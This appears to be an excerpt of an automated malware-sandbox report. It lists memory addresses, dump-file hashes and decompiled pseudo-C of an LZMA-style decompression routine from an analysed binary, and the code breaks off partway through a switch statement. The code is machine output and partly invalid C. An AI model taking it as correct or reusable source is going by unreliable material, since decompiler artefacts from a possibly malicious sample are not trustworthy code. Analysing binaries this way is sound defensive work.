                                            0x00000000
                                            0x00406afb
                                            0x00406af9
                                            0x00406b00
                                            0x00406b00
                                            0x00406b00
                                            0x00406b00
                                            0x00000000
                                            0x00000000
                                            0x00406b3b
                                            0x00406b3b
                                            0x00406b3f
                                            0x00407147
                                            0x00000000
                                            0x00407147
                                            0x00406b45
                                            0x00406b48
                                            0x00406b4b
                                            0x00406b4f
                                            0x00406b52
                                            0x00406b58
                                            0x00406b5a
                                            0x00406b5a
                                            0x00406b5a
                                            0x00406b5d
                                            0x00406b60
                                            0x00406b60
                                            0x00406b66
                                            0x00406b04
                                            0x00406b04
                                            0x00406b07
                                            0x00000000
                                            0x00406b07
                                            0x00406b68
                                            0x00406b68
                                            0x00406b6b
                                            0x00406b6e
                                            0x00406b71
                                            0x00406b74
                                            0x00406b77
                                            0x00406b7a
                                            0x00406b7d
                                            0x00406b80
                                            0x00406b83
                                            0x00406b86
                                            0x00406b9e
                                            0x00406ba1
                                            0x00406ba4
                                            0x00406ba7
                                            0x00406ba7
                                            0x00406baa
                                            0x00406bae
                                            0x00406bb0
                                            0x00406b88
                                            0x00406b88
                                            0x00406b90
                                            0x00406b95
                                            0x00406b97
                                            0x00406b99
                                            0x00406b99
                                            0x00406bb3
                                            0x00406bba
                                            0x00406bbd
                                            0x00000000
                                            0x00406bbf
                                            0x00000000
                                            0x00406bbf
                                            0x00000000
                                            0x00406e4c
                                            0x00406e4c
                                            0x00406e50
                                            0x00407177
                                            0x00000000
                                            0x00407177
                                            0x00406e56
                                            0x00406e59
                                            0x00406e5c
                                            0x00406e60
                                            0x00406e63
                                            0x00406e69
                                            0x00406e6b
                                            0x00406e6b
                                            0x00406e6b
                                            0x00406e6e
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00406f5b
                                            0x00406f5f
                                            0x00406f81
                                            0x00406f84
                                            0x00406f8e
                                            0x00406f91
                                            0x00406f91
                                            0x00406f91
                                            0x00000000
                                            0x00406f91
                                            0x00406f91
                                            0x00406f61
                                            0x00406f64
                                            0x00406f68
                                            0x00406f6b
                                            0x00406f6b
                                            0x00406f6e
                                            0x00000000
                                            0x00000000
                                            0x00407018
                                            0x0040701c
                                            0x0040703a
                                            0x0040703a
                                            0x0040703a
                                            0x00407041
                                            0x00407048
                                            0x0040704f
                                            0x0040704f
                                            0x00000000
                                            0x0040704f
                                            0x0040701e
                                            0x00407021
                                            0x00407024
                                            0x00407027
                                            0x0040702e
                                            0x00406f72
                                            0x00406f72
                                            0x00406f75
                                            0x00000000
                                            0x00000000
                                            0x00407109
                                            0x0040710c
                                            0x0040700d
                                            0x00000000
                                            0x00000000
                                            0x00406d43
                                            0x00406d45
                                            0x00406d4c
                                            0x00406d4d
                                            0x00406d4f
                                            0x00406d52
                                            0x00000000
                                            0x00000000
                                            0x00406d5a
                                            0x00406d5d
                                            0x00406d60
                                            0x00406d62
                                            0x00406d64
                                            0x00406d64
                                            0x00406d65
                                            0x00406d68
                                            0x00406d6f
                                            0x00406d72
                                            0x00406d80
                                            0x00000000
                                            0x00000000
                                            0x00407056
                                            0x00407056
                                            0x00407059
                                            0x00407060
                                            0x00000000
                                            0x00000000
                                            0x00407065
                                            0x00407065
                                            0x00407069
                                            0x004071a1
                                            0x00000000
                                            0x004071a1
                                            0x0040706f
                                            0x00407072
                                            0x00407075
                                            0x00407079
                                            0x0040707c
                                            0x00407082
                                            0x00407084
                                            0x00407084
                                            0x00407084
                                            0x00407087
                                            0x0040708a
                                            0x0040708a
                                            0x0040708a
                                            0x0040708a
                                            0x0040708d
                                            0x0040708d
                                            0x00407091
                                            0x004070f1
                                            0x004070f4
                                            0x004070f9
                                            0x004070fa
                                            0x004070fc
                                            0x004070fe
                                            0x00407101
                                            0x0040700d
                                            0x0040700d
                                            0x00000000
                                            0x00407013
                                            0x0040700d
                                            0x00407093
                                            0x00407099
                                            0x0040709c
                                            0x0040709f
                                            0x004070a2
                                            0x004070a5
                                            0x004070a8
                                            0x004070ab
                                            0x004070ae
                                            0x004070b1
                                            0x004070b4
                                            0x004070cd
                                            0x004070d0
                                            0x004070d3
                                            0x004070d6
                                            0x004070da
                                            0x004070dc
                                            0x004070dc
                                            0x004070dd
                                            0x004070e0
                                            0x004070b6
                                            0x004070b6
                                            0x004070be
                                            0x004070c3
                                            0x004070c5
                                            0x004070c8
                                            0x004070c8
                                            0x004070e3
                                            0x004070ea
                                            0x00000000
                                            0x004070ec
                                            0x00000000
                                            0x004070ec
                                            0x00000000
                                            0x00406d88
                                            0x00406d8b
                                            0x00406dc1
                                            0x00406ef1
                                            0x00406ef1
                                            0x00406ef1
                                            0x00406ef1
                                            0x00406ef4
                                            0x00406ef4
                                            0x00406ef7
                                            0x00406ef9
                                            0x00407183
                                            0x00000000
                                            0x00407183
                                            0x00406eff
                                            0x00406f02
                                            0x00000000
                                            0x00000000
                                            0x00406f08
                                            0x00406f0c
                                            0x00406f0f
                                            0x00406f0f
                                            0x00406f0f
                                            0x00000000
                                            0x00406f0f
                                            0x00406d8d
                                            0x00406d8f
                                            0x00406d91
                                            0x00406d93
                                            0x00406d96
                                            0x00406d97
                                            0x00406d99
                                            0x00406d9b
                                            0x00406d9e
                                            0x00406da1
                                            0x00406db7
                                            0x00406dbc
                                            0x00406df4
                                            0x00406df4
                                            0x00406df8
                                            0x00406e24
                                            0x00406e26
                                            0x00406e2d
                                            0x00406e30
                                            0x00406e33
                                            0x00406e33
                                            0x00406e38
                                            0x00406e38
                                            0x00406e3a
                                            0x00406e3d
                                            0x00406e44
                                            0x00406e47
                                            0x00406e74
                                            0x00406e74
                                            0x00406e77
                                            0x00406e7a
                                            0x00406eee
                                            0x00406eee
                                            0x00406eee
                                            0x00000000
                                            0x00406eee
                                            0x00406e7c
                                            0x00406e82
                                            0x00406e85
                                            0x00406e88
                                            0x00406e8b
                                            0x00406e8e
                                            0x00406e91
                                            0x00406e94
                                            0x00406e97
                                            0x00406e9a
                                            0x00406e9d
                                            0x00406eb6
                                            0x00406eb8
                                            0x00406ebb
                                            0x00406ebc
                                            0x00406ebf
                                            0x00406ec1
                                            0x00406ec4
                                            0x00406ec6
                                            0x00406ec8
                                            0x00406ecb
                                            0x00406ecd
                                            0x00406ed0
                                            0x00406ed4
                                            0x00406ed6
                                            0x00406ed6
                                            0x00406ed7
                                            0x00406eda
                                            0x00406edd
                                            0x00406e9f
                                            0x00406e9f
                                            0x00406ea7
                                            0x00406eac
                                            0x00406eae
                                            0x00406eb1
                                            0x00406eb1
                                            0x00406ee0
                                            0x00406ee7
                                            0x00406e71
                                            0x00406e71
                                            0x00406e71
                                            0x00406e71
                                            0x00000000
                                            0x00406ee9
                                            0x00000000
                                            0x00406ee9
                                            0x00406ee7
                                            0x00406dfa
                                            0x00406dfd
                                            0x00406dff
                                            0x00406e02
                                            0x00406e05
                                            0x00406e08
                                            0x00406e0a
                                            0x00406e0d
                                            0x00406e10
                                            0x00406e10
                                            0x00406e13
                                            0x00406e13
                                            0x00406e16
                                            0x00406e1d
                                            0x00406df1
                                            0x00406df1
                                            0x00406df1
                                            0x00406df1
                                            0x00000000
                                            0x00406e1f
                                            0x00000000
                                            0x00406e1f
                                            0x00406e1d
                                            0x00406da3
                                            0x00406da6
                                            0x00406da8
                                            0x00406dab
                                            0x00000000
                                            0x00000000
                                            0x00406b0a
                                            0x00406b0a
                                            0x00406b0e
                                            0x00407153
                                            0x00000000
                                            0x00407153
                                            0x00406b14
                                            0x00406b17
                                            0x00406b1a
                                            0x00406b1d
                                            0x00406b20
                                            0x00406b23
                                            0x00406b26
                                            0x00406b28
                                            0x00406b2b
                                            0x00406b2e
                                            0x00406b31
                                            0x00406b33
                                            0x00406b33
                                            0x00406b33
                                            0x00000000
                                            0x00000000
                                            0x00406c95
                                            0x00406c95
                                            0x00406c99
                                            0x0040715f
                                            0x00000000
                                            0x0040715f
                                            0x00406c9f
                                            0x00406ca2
                                            0x00406ca5
                                            0x00406ca8
                                            0x00406caa
                                            0x00406caa
                                            0x00406caa
                                            0x00406cad
                                            0x00406cb0
                                            0x00406cb3
                                            0x00406cb6
                                            0x00406cb9
                                            0x00406cbc
                                            0x00406cbd
                                            0x00406cbf
                                            0x00406cbf
                                            0x00406cbf
                                            0x00406cc2
                                            0x00406cc5
                                            0x00406cc8
                                            0x00406ccb
                                            0x00406ccb
                                            0x00406ccb
                                            0x00406cce
                                            0x00406cd0
                                            0x00406cd0
                                            0x00000000
                                            0x00000000
                                            0x00406f12
                                            0x00406f12
                                            0x00406f12
                                            0x00406f16
                                            0x00000000
                                            0x00000000
                                            0x00406f1c
                                            0x00406f1f
                                            0x00406f22
                                            0x00406f25
                                            0x00406f27
                                            0x00406f27
                                            0x00406f27
                                            0x00406f2a
                                            0x00406f2d
                                            0x00406f30
                                            0x00406f33
                                            0x00406f36
                                            0x00406f39
                                            0x00406f3a
                                            0x00406f3c
                                            0x00406f3c
                                            0x00406f3c
                                            0x00406f3f
                                            0x00406f42
                                            0x00406f45
                                            0x00406f48
                                            0x00406f4b
                                            0x00406f4f
                                            0x00406f51
                                            0x00406f54
                                            0x00000000
                                            0x00406f56
                                            0x00406cd3
                                            0x00406cd3
                                            0x00000000
                                            0x00406cd3
                                            0x00406f54
                                            0x00407189
                                            0x00000000
                                            0x00000000
                                            0x004067b8
                                            0x004071c0
                                            0x004071c0
                                            0x00000000
                                            0x004071c0
                                            0x0040700d
                                            0x00406f94
                                            0x00406f91
                                            0x00000000
                                            0x00406ce6

                                            Memory Dump Source
                                            • Source File: 00000000.00000002.661113502.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.661110204.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661119046.0000000000408000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661122918.000000000040A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661128357.0000000000413000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661135352.0000000000422000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661139040.000000000042A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661143205.000000000042D000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1e7a7db026ec9aad88acaa11386c02789d7bc6b83e00ba9479abd6ecc9ecffba
                                            • Instruction ID: a9aff89c954bf491ffe4c30e494efe667c8bfb024e4a61e14b5544386b4e6ab4
                                            • Opcode Fuzzy Hash: 1e7a7db026ec9aad88acaa11386c02789d7bc6b83e00ba9479abd6ecc9ecffba
                                            • Instruction Fuzzy Hash: 47713471D04229CBDF28CF98C844BADBBB1FF48305F15806AD856BB281C7786996DF45
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00406C2E, Relevance: 5.2, APIs: 4, Instructions: 168COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 98%
                                            			E00406C2E() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xa;
						_t606 =  *(_t613 - 4) + 0x1b0 +  *(_t613 - 0x38) * 2;
					} else {
						 *(__ebp - 0x84) = 9;
						 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
					}
					while(1) {
						 *(_t613 - 0x54) = _t606;
						while(1) {
							L133:
							_t531 =  *_t606;
							_t589 = _t531 & 0x0000ffff;
							_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
							if( *(_t613 - 0xc) >= _t565) {
								 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
								 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
								 *(_t613 - 0x40) = 1;
								_t532 = _t531 - (_t531 >> 5);
								 *_t606 = _t532;
							} else {
								 *(_t613 - 0x10) = _t565;
								 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
								 *_t606 = (0x800 - _t589 >> 5) + _t531;
							}
							if( *(_t613 - 0x10) >= 0x1000000) {
								goto L139;
							}
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								L170:
								_t568 = 0x22;
								memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
								_t535 = 0;
								L172:
								return _t535;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L139:
							_t533 =  *(_t613 - 0x84);
							while(1) {
								 *(_t613 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t613 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M004071C8))) {
										case 0:
											if( *(_t613 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t534 =  *( *(_t613 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t570);
											_push(9);
											_pop(_t571);
											_t609 = _t538 / _t570;
											_t540 = _t538 % _t570 & 0x000000ff;
											asm("cdq");
											_t604 = _t540 % _t571 & 0x000000ff;
											 *(_t613 - 0x3c) = _t604;
											 *(_t613 - 0x1c) = (1 << _t609) - 1;
											 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
											_t612 = (0x300 << _t604 + _t609) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
												L10:
												if(_t612 == 0) {
													L12:
													 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t612 = _t612 - 1;
													 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
												} while (_t612 != 0);
												goto L12;
											}
											if( *(_t613 - 4) != 0) {
												GlobalFree( *(_t613 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t613 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 1;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t45 = _t613 - 0x48;
											 *_t45 =  *(_t613 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t613 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t613 - 0x40);
											if(_t546 ==  *(_t613 - 0x74)) {
												L20:
												 *(_t613 - 0x48) = 5;
												 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t613 - 0x74) = _t546;
											if( *(_t613 - 8) != 0) {
												GlobalFree( *(_t613 - 8));
											}
											_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
											 *(_t613 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
											 *(_t613 - 0x84) = 6;
											 *(_t613 - 0x4c) = _t553;
											_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
											 *(_t613 - 0x54) = _t606;
											goto L133;
										case 3:
											L21:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 3;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											_t67 = _t613 - 0x70;
											 *_t67 =  &(( *(_t613 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
											L23:
											 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
											if( *(_t613 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t606;
											_t589 = _t531 & 0x0000ffff;
											_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
											if( *(_t613 - 0xc) >= _t565) {
												 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
												 *(_t613 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												 *_t606 = _t532;
											} else {
												 *(_t613 - 0x10) = _t565;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
												 *_t606 = (0x800 - _t589 >> 5) + _t531;
											}
											if( *(_t613 - 0x10) >= 0x1000000) {
												goto L139;
											}
										case 5:
											goto L137;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 8:
											goto L0;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L89;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t258 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t258;
											0 | _t258 = _t258 + _t258 + 9;
											 *(__ebp - 0x38) = _t258 + _t258 + 9;
											goto L75;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x28);
											goto L88;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L88:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L89:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
